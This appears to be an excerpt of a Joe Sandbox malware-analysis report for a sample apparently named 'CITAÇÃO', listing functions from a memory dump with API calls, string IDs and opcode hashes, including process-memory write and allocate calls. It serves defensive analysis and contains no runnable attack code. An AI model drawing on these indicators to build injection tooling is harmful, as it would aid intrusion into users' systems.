                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Destroy$DeleteObjectWindow$Icon
                                                      • String ID:
                                                      • API String ID: 4023252218-0
                                                      • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                      • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                      • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                      • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                      Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                      • String ID:
                                                      • API String ID: 1489400265-0
                                                      • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                      • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                      • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                      • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                      Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                      • DestroyWindow.USER32(?), ref: 00455728
                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                      • String ID:
                                                      • API String ID: 1042038666-0
                                                      • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                      • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                      • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                      • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                      Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                      • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                      • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                      • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                      Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __getptd.LIBCMT ref: 0041780F
                                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                      • __getptd.LIBCMT ref: 00417826
                                                      • __amsg_exit.LIBCMT ref: 00417834
                                                      • __lock.LIBCMT ref: 00417844
                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                      • String ID:
                                                      • API String ID: 938513278-0
                                                      • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                      • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                      • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                      • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                      Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                      • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                      • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                      • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                      • ExitThread.KERNEL32 ref: 00413D4E
                                                      • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                      • __freefls@4.LIBCMT ref: 00413D74
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                      • String ID:
                                                      • API String ID: 2403457894-0
                                                      • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                      • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                      • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                      • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                      Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                      • ExitThread.KERNEL32 ref: 004151ED
                                                      • __freefls@4.LIBCMT ref: 00415209
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                      • String ID:
                                                      • API String ID: 4247068974-0
                                                      • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                      • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                      • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                      • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                      Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )$U$\
                                                      • API String ID: 0-3705770531
                                                      • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                      • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                      • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                      • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                      Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                      • CoInitialize.OLE32(00000000), ref: 0046E505
                                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                      • CoUninitialize.OLE32 ref: 0046E53D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 886957087-24824748
                                                      • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                      • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                      • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                      • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                      Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 708495834-557222456
                                                      • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                      • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                      • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                      • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                      Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                      • CoInitialize.OLE32(00000000), ref: 00478442
                                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                      • CoUninitialize.OLE32 ref: 0047863C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 886957087-24824748
                                                      • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                      • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                      • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                      • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                      Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                        • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                        • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                        • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                        • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                      • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                      • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                      • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                      • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                      Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: \$]$h
                                                      • API String ID: 4104443479-3262404753
                                                      • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                      • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                      • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                      • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                      Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                      • CloseHandle.KERNEL32(?), ref: 00457E09
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                      • String ID: <$@
                                                      • API String ID: 2417854910-1426351568
                                                      • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
